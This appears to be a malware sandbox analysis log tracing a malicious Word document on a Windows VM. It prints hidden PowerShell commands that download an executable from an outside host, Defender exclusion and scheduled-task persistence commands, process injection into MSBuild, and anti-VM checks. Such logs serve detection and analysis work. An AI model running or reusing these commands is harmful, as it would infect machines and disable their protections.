          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2868Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 804Thread sleep count: 8031 > 30
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672Thread sleep time: -660000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 412Thread sleep time: -41226s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 236Thread sleep count: 60 > 30
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 152Thread sleep time: -41226s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1224Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 852Thread sleep count: 60 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 240000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 240000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 240000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeWindow / User API: threadDelayed 9399
          Source: C:\Users\user\AppData\Roaming\explorer.exeWindow / User API: threadDelayed 8031
          Source: C:\Users\user\AppData\Roaming\explorer.exeWindow / User API: threadDelayed 6595
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 240000
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 41226
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 240000
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 41226
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 240000
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 41226
          Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000001D.00000002.1030166755.000000000087D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware_S
          Source: explorer.exe, 0000001D.00000002.1030821479.00000000008E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARETSOFTWARE\Oracle\VirtualBox Guest Additions
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\NSYSTEM\ControlSet001\Services\Disk\Enum
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEInjected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t Program Manager
          Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: J Program Managerr_
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
